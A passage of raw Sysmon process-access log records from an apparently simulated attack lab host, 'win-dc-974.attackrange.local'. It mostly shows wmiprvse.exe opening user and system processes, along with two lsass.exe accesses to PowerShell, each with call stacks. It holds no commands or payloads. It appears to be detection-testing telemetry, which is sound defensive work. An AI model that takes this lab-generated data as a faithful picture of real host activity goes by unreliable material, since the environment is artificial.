16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-74AA-00000000AD01}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-74AA-00000000AD01}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program 